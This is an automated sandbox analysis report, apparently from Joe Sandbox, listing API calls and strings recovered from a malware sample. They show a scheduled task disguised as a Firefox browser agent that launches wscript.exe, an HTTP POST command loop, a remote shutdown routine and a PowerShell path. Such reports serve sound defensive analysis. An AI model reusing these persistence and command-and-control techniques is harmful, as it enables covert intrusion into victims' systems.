            • HeapFree.KERNEL32(00000000), ref: 02B8905B
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B89060
            • HeapFree.KERNEL32(00000000), ref: 02B89063
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: Heap$Process$Free$AllocCryptRandomwsprintf
            • String ID: %d|%s|%s|%s$qE2PyNqQ
            • API String ID: 4113358155-501091151
            • Opcode ID: 310910f53aa5546de013e01c405086ff2a8e8fd6972a10b8db4d7090643f7622
            • Instruction ID: cacb9a9a7aa624249268f146444928c3673f84d5ea9f1e8a47f1d23855b074f8
            • Opcode Fuzzy Hash: 310910f53aa5546de013e01c405086ff2a8e8fd6972a10b8db4d7090643f7622
            • Instruction Fuzzy Hash: 8F21D671E4030CABFB10B6A4DC0AFEF7B6DEF44754F080595FA0DA7181EA609915CBA6
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VariantInit.OLEAUT32(?), ref: 02B86AB7
            • CoCreateInstance.OLE32(02B81020,00000000,00000001,02B81000,?), ref: 02B86AD4
            • SysAllocString.OLEAUT32(\Mozilla), ref: 02B86B14
            • SysFreeString.OLEAUT32(?), ref: 02B86B4B
            • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 02B86B58
            • SysFreeString.OLEAUT32(00000000), ref: 02B86B6F
            Strings
            • Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 02B86B53
            • \Mozilla, xrefs: 02B86B0F
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: String$AllocFree$CreateInitInstanceVariant
            • String ID: Firefox Default Browser Agent 318146B0AF4A39CB$\Mozilla
            • API String ID: 478541636-3211539605
            • Opcode ID: 3995bbc882b4c15238fd165a6492baff3de4fdeed080ba026261693608a04796
            • Instruction ID: 6159d9f554d0844cc0ae4e04ad5ddad5fc76e42759c89c868f9c64f3cd24165f
            • Opcode Fuzzy Hash: 3995bbc882b4c15238fd165a6492baff3de4fdeed080ba026261693608a04796
            • Instruction Fuzzy Hash: 4D318675F51244AFE700AB79CC85BAEBBB8EF49348F0041D8F909EB211D6319985C7A1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32(00000028,?), ref: 02B861BD
            • OpenProcessToken.ADVAPI32(00000000), ref: 02B861C4
            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02B861D9
            • CloseHandle.KERNEL32(?), ref: 02B861E6
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02B86210
            • CloseHandle.KERNEL32(?), ref: 02B8621B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
            • String ID: SeShutdownPrivilege
            • API String ID: 158869116-3733053543
            • Opcode ID: 2f79bbd6349654c8ff2caf6419fdb72afbf62bf21f0fa0b0a0b261f8471a8df6
            • Instruction ID: bf353dd747908916c6fdc730b789fcdb143a9782a34ca4d47e790bb182c757eb
            • Opcode Fuzzy Hash: 2f79bbd6349654c8ff2caf6419fdb72afbf62bf21f0fa0b0a0b261f8471a8df6
            • Instruction Fuzzy Hash: 2A014431E81219BBDB10ABF49D09BEE7B7CFB04745F100494F91CE6181D7718A24D7A1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 008F4228
            • IsDebuggerPresent.KERNEL32 ref: 008F42F4
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008F4314
            • UnhandledExceptionFilter.KERNEL32(?), ref: 008F431E
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
            • String ID:
            • API String ID: 254469556-0
            • Opcode ID: b09ab69437c06a7e2c04234d71c6ae9b4ef379d1e95f5d5c7489719a02f14bf1
            • Instruction ID: 2884a98fe2d04d6dbd5c578624d5c79156ec3e53216bd3a8be1302c6229dc0e0
            • Opcode Fuzzy Hash: b09ab69437c06a7e2c04234d71c6ae9b4ef379d1e95f5d5c7489719a02f14bf1
            • Instruction Fuzzy Hash: 5D314775D0521C9FDB10DFA4D989BDDBBB8FF08304F1040AAE50DAB250EB709A848F05
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 008F6A53
            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 008F6A5D
            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 008F6A6A
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 6fcbc162363790160084011007aef1faea72cee104668ae1a7a71fcd35b67bf1
            • Instruction ID: b789e12ddfb5401b5f1aa32ddd86dd33f777e5b9288e95236e0aec038ae2a1a4
            • Opcode Fuzzy Hash: 6fcbc162363790160084011007aef1faea72cee104668ae1a7a71fcd35b67bf1
            • Instruction Fuzzy Hash: F231927591122C9BCB21DF68DC8979DBBB8FF08310F5082EAE51CA7250EB709B858F55
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32(?,?,008F75A1,?,?,?,?,?,008FC8FA), ref: 008F75C4
            • TerminateProcess.KERNEL32(00000000,?,008F75A1,?,?,?,?,?,008FC8FA), ref: 008F75CB
            • ExitProcess.KERNEL32 ref: 008F75DD
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Process$CurrentExitTerminate
            • String ID:
            • API String ID: 1703294689-0
            • Opcode ID: cd89b7f62ccc2ea77786217926b6bd51d631411271bf925a9157bde7dbed3654
            • Instruction ID: 919e30236f2c5eb0bce4d681d695993fb9b3b89a1048d463834dfb3b2f4e0c59
            • Opcode Fuzzy Hash: cd89b7f62ccc2ea77786217926b6bd51d631411271bf925a9157bde7dbed3654
            • Instruction Fuzzy Hash: 09E0EC3102868CAFDF126F68DE49A683B7DFB49342F014424FA45C6131CB39DD82EB51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008FE878,?,?,00000008,?,?,008FE510,00000000), ref: 008FEAAA
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ExceptionRaise
            • String ID:
            • API String ID: 3997070919-0
            • Opcode ID: 56c6f305b4455e9a325b4232f56289280c691552ed6d5940eff4748c1351ba70
            • Instruction ID: c135adec93021c51d979ae187816d967b2b46abe2a4c87723c3cc24cd405250c
            • Opcode Fuzzy Hash: 56c6f305b4455e9a325b4232f56289280c691552ed6d5940eff4748c1351ba70
            • Instruction Fuzzy Hash: A8B11831610609DFD719CF28C48AB657BA1FF45364F298658EADACF2B1C335E991CB40
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008F44DB
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: FeaturePresentProcessor
            • String ID:
            • API String ID: 2325560087-0
            • Opcode ID: 604ab39105fe9da9475113d11a72ffd72c3c6613e0692819a63de38c29d455c2
            • Instruction ID: 313661048e69bcfeadfd200de2e2f0303bc8e6e5e800b490c6c4b61818158289
            • Opcode Fuzzy Hash: 604ab39105fe9da9475113d11a72ffd72c3c6613e0692819a63de38c29d455c2
            • Instruction Fuzzy Hash: 0C51C4B1A156198FFB18CF68D8817ABBBF4FB48314F24882AD591EB250DB74D940DF50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: CountTick
            • String ID:
            • API String ID: 536389180-0
            • Opcode ID: 7b83610cd0aaf28d5e19faad262ceb1d88c952d97f892d9c21ddc48597d5b4de
            • Instruction ID: d6cbc0a9abda1aaef849da445ed4eea4f2fdb4b456791e28be398f672b435016
            • Opcode Fuzzy Hash: 7b83610cd0aaf28d5e19faad262ceb1d88c952d97f892d9c21ddc48597d5b4de
            • Instruction Fuzzy Hash: D1319032BA00008FC74CDB2CEC656A573E2F78D350B19496ED95ED76C1E639A862CB40
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_000043BB,008F3BBB), ref: 008F43B4
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: da4d7b3d68adb6bb07396dd745ca05708449983df6dede964883a8f2493addb0
            • Instruction ID: abaf61385d057e3d6765e32d9dc494d4fe133850594c61686aadb6549f3bf517
            • Opcode Fuzzy Hash: da4d7b3d68adb6bb07396dd745ca05708449983df6dede964883a8f2493addb0
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: 0
            • API String ID: 0-4108050209
            • Opcode ID: cc18de1e23392e391c7ff8e93e73e3e065b27f9818f5ba30032d45b3423df2f8
            • Instruction ID: 3eb170fd37b5b2f13de1ac1236f18741a0c8cf1b38074a6032324d562f36eeb3
            • Opcode Fuzzy Hash: cc18de1e23392e391c7ff8e93e73e3e065b27f9818f5ba30032d45b3423df2f8
            • Instruction Fuzzy Hash: 5651C235E152D88EDB1D9BEC48502ECBFB19F56204F5881EEDC9AA7643C9384A09CB61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: HeapProcess
            • String ID:
            • API String ID: 54951025-0
            • Opcode ID: b47722631469202c68b05c95b9da547f6724270af6715c54a365eac595d2987f
            • Instruction ID: b6422e4b255b8646591df88894c027b7ebec9dee2518460eb913a8cdfe623a71
            • Opcode Fuzzy Hash: b47722631469202c68b05c95b9da547f6724270af6715c54a365eac595d2987f
            • Instruction Fuzzy Hash: CEA0243031C140CFC344CF305F0534C37DC57007C030000145004C5171DF3040407711
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f73a58701b281c8fe5d33f5e28a8cb8289218132fb396038d9597af07f26b066
            • Instruction ID: ebe652db02ac66e47e1ca7913d8d5fe14b7f3f2c25e147f69af39e66308ee170
            • Opcode Fuzzy Hash: f73a58701b281c8fe5d33f5e28a8cb8289218132fb396038d9597af07f26b066
            • Instruction Fuzzy Hash: 197249348241D98EDB18FB64D960AEC77B6BF26700F5411FDD84E12956FB302A8ACF64
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
            • Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
            • Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
            • Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
            • Instruction ID: 73e406487ab2d54a8bfcf40f8de6d0ffa046dfc06f411e87fe37f594e04bd5dc
            • Opcode Fuzzy Hash: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
            • Instruction Fuzzy Hash: 49E04672921268EBCB14EFAC8904AAAB2ACFB88B50B264496F601D3101C670DE00C7D1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 285 2b86b90-2b86be9 VariantInit CoCreateInstance 286 2b86c49 285->286 287 2b86beb-2b86c1a 285->287 288 2b86c4c-2b86c4f 286->288 287->286 293 2b86c1c-2b86c3c SysAllocString 287->293 289 2b86c53-2b86c5b 288->289 291 2b86c5d-2b86c5e SysFreeString 289->291 292 2b86c60-2b86c64 289->292 291->292 294 2b86fba-2b86fbf 292->294 295 2b86c6a-2b86c9b SysAllocString SysFreeString 292->295 293->288 300 2b86c3e-2b86c47 293->300 296 2b86fc1-2b86fc3 294->296 297 2b86fc7-2b86fd0 294->297 301 2b86cbd-2b86cbf 295->301 302 2b86c9d-2b86cba SysAllocString SysFreeString 295->302 296->297 300->289 303 2b86cd9-2b86cf1 301->303 304 2b86cc1-2b86cd7 SysAllocString SysFreeString 301->304 302->301 308 2b86fb1-2b86fb5 303->308 309 2b86cf7-2b86d0d 303->309 304->303 308->294 311 2b86d0f-2b86d4b SysAllocString SysFreeString SysAllocString SysFreeString 309->311 312 2b86d50-2b86d66 309->312 311->312 315 2b86d68-2b86daf SysAllocString SysFreeString 312->315 316 2b86db4-2b86dd8 312->316 315->316 321 2b86dde-2b86def 316->321 322 2b86e76-2b86e7b 316->322 321->322 329 2b86df5-2b86e08 321->329 323 2b86e7d-2b86e7f 322->323 324 2b86e83-2b86e88 322->324 323->324 327 2b86e8a-2b86e8c 324->327 328 2b86e90-2b86eb4 324->328 327->328 334 2b86f16-2b86f1b 328->334 335 2b86eb6-2b86ec7 328->335 329->322 336 2b86e0a-2b86e4c SysAllocString SysFreeString SysAllocString SysFreeString 329->336 337 2b86f1d-2b86f1f 334->337 338 2b86f23-2b86f28 334->338 335->334 344 2b86ec9-2b86edc 335->344 353 2b86e6d-2b86e71 336->353 354 2b86e4e-2b86e68 SysAllocString SysFreeString 336->354 337->338 340 2b86f2a-2b86f2c 338->340 341 2b86f30-2b86f34 338->341 340->341 345 2b86fa8-2b86fac 341->345 346 2b86f36-2b86fa2 VariantInit SysAllocString * 2 SysFreeString VariantClear 341->346 344->334 350 2b86ede-2b86ef9 SysAllocString SysFreeString 344->350 345->308 346->345 355 2b86efb-2b86f0b SysAllocString SysFreeString 350->355 356 2b86f0d-2b86f11 350->356 353->322 354->353 355->356 356->334
            APIs
            • VariantInit.OLEAUT32(?), ref: 02B86BAE
            • CoCreateInstance.OLE32(02B81020,00000000,00000001,02B81000,?), ref: 02B86BDB
            • SysAllocString.OLEAUT32(02B81498), ref: 02B86C21
            • SysFreeString.OLEAUT32(?), ref: 02B86C5E
            • SysAllocString.OLEAUT32(\Mozilla), ref: 02B86C6F
            • SysFreeString.OLEAUT32(00000000), ref: 02B86C91
            • SysAllocString.OLEAUT32(\Mozilla), ref: 02B86CA2
            • SysFreeString.OLEAUT32(00000000), ref: 02B86CB8
            • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 02B86CC6
            • SysFreeString.OLEAUT32(00000000), ref: 02B86CD7
            • SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 02B86D14
            • SysFreeString.OLEAUT32(00000000), ref: 02B86D23
            • SysAllocString.OLEAUT32(Mozilla), ref: 02B86D2A
            • SysFreeString.OLEAUT32(00000000), ref: 02B86D39
            • SysAllocString.OLEAUT32(PT0S), ref: 02B86D8E
            • SysFreeString.OLEAUT32(00000000), ref: 02B86D9D
            • SysAllocString.OLEAUT32(Trigger1), ref: 02B86E0F
            • SysFreeString.OLEAUT32(00000000), ref: 02B86E1E
            • SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 02B86E25
            • SysFreeString.OLEAUT32(00000000), ref: 02B86E34
            • SysAllocString.OLEAUT32(PT1M), ref: 02B86E53
            • SysFreeString.OLEAUT32(00000000), ref: 02B86E62
            • SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 02B86EE3
            • SysFreeString.OLEAUT32(00000000), ref: 02B86EF2
            • SysAllocString.OLEAUT32(?), ref: 02B86EFC
            • SysFreeString.OLEAUT32(00000000), ref: 02B86F0B
            • VariantInit.OLEAUT32(?), ref: 02B86F3A
            • SysAllocString.OLEAUT32(02B8113C), ref: 02B86F4E
            • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 02B86F5F
            • SysFreeString.OLEAUT32(00000000), ref: 02B86F9C
            • VariantClear.OLEAUT32(?), ref: 02B86FA2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
            • String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 318146B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
            • API String ID: 3904693211-3377861604
            • Opcode ID: 3a11007cc9f9dc62d3e843d4d004ed76f36626fbc0fee977a668115a5658df4f
            • Instruction ID: 37768774cf4693a8774fdd1cf3cc2f3e12b00295d17c1b4651dbd997a1af4426
            • Opcode Fuzzy Hash: 3a11007cc9f9dc62d3e843d4d004ed76f36626fbc0fee977a668115a5658df4f
            • Instruction Fuzzy Hash: 1FF10E71A00209AFDB14EFA9C948FAEBBF8FF49344F144198F509EB250DB71A945CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 395 2b87d20-2b87d75 wsprintfA GetTickCount64 call 2b82660 398 2b87d78-2b87d99 call 2b86670 395->398 401 2b87d9b-2b87dab Sleep 398->401 402 2b87dad-2b87dbb lstrcmpA 398->402 401->398 403 2b87dbd-2b87dcc call 2b88f70 call 2b855d0 402->403 404 2b87dce-2b87df8 call 2b86420 * 2 call 2b86230 402->404 403->398 415 2b8827b-2b88299 GetTickCount64 404->415 416 2b87dfe-2b87e00 404->416 417 2b8829b 415->417 418 2b882be-2b882db call 2b855d0 Sleep 415->418 416->415 419 2b87e06-2b87e0c 416->419 420 2b8829d-2b8829f 417->420 421 2b882a1-2b882bb call 2b82660 call 2b873f0 417->421 418->398 419->415 422 2b87e12-2b87e85 call 2b855f0 call 2b87410 call 2b824c0 call 2b855b0 call 2b855f0 call 2b86420 call 2b82660 call 2b873f0 StrToIntA 419->422 420->418 420->421 421->418 445 2b87e8b 422->445 446 2b88271-2b88279 call 2b855d0 422->446 448 2b87e92-2b87ea6 call 2b86420 * 2 445->448 449 2b88253-2b8825a call 2b861b0 445->449 446->418 448->446 458 2b87eac-2b87eae 448->458 449->446 456 2b8825c-2b8826b InitiateSystemShutdownExW 449->456 456->446 458->446 459 2b87eb4-2b87edd StrToIntA call 2b86230 call 2b855b0 458->459 459->446 464 2b87ee3-2b87ee9 459->464 465 2b87eeb-2b87f2d GetSystemDirectoryW PathCombineW wnsprintfW 464->465 466 2b87f2f-2b87f32 464->466 467 2b87f84-2b87fcb GetModuleHandleA GetProcAddress * 2 465->467 466->467 468 2b87f34-2b87f4d call 2b86230 call 2b827a0 466->468 469 2b87fcd-2b87fd0 467->469 470 2b87fd3-2b87fd7 467->470 468->467 480 2b87f4f-2b87f7f ExpandEnvironmentStringsW wnsprintfW call 2b855d0 468->480 469->470 472 2b87fd9-2b87fee call 2b856a0 470->472 473 2b88011-2b88035 LoadLibraryA GetProcAddress 470->473 477 2b88039-2b8803e 472->477 483 2b87ff0-2b8800f call 2b86230 call 2b82690 call 2b855d0 472->483 473->477 481 2b88040 477->481 482 2b88045-2b88057 call 2b855b0 477->482 480->467 481->482 489 2b880f8-2b8810f call 2b855d0 * 3 482->489 490 2b8805d-2b880e2 call 2b88f00 call 2b87410 wsprintfA wnsprintfA call 2b824c0 call 2b86670 482->490 483->477 489->418 509 2b880eb-2b880f5 call 2b855d0 490->509 510 2b880e4-2b880e6 call 2b855d0 490->510 509->489 510->509
            APIs
            • wsprintfA.USER32 ref: 02B87D46
            • GetTickCount64.KERNEL32 ref: 02B87D54
              • Part of subcall function 02B86670: ObtainUserAgentString.URLMON(00000000,?,?), ref: 02B86692
              • Part of subcall function 02B86670: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 02B866B2
              • Part of subcall function 02B86670: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02B86718
              • Part of subcall function 02B86670: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 02B86751
              • Part of subcall function 02B86670: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02B8676E
              • Part of subcall function 02B86670: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 02B867A7
              • Part of subcall function 02B86670: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 02B867D0
            • Sleep.KERNEL32(00000000), ref: 02B87DA6
            • lstrcmpA.KERNEL32(00000000,INIT), ref: 02B87DB3
            • StrToIntA.SHLWAPI(00000000), ref: 02B87E76
            • StrToIntA.SHLWAPI(00000000), ref: 02B87EBB
            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02B87EF7
            • PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 02B87F10
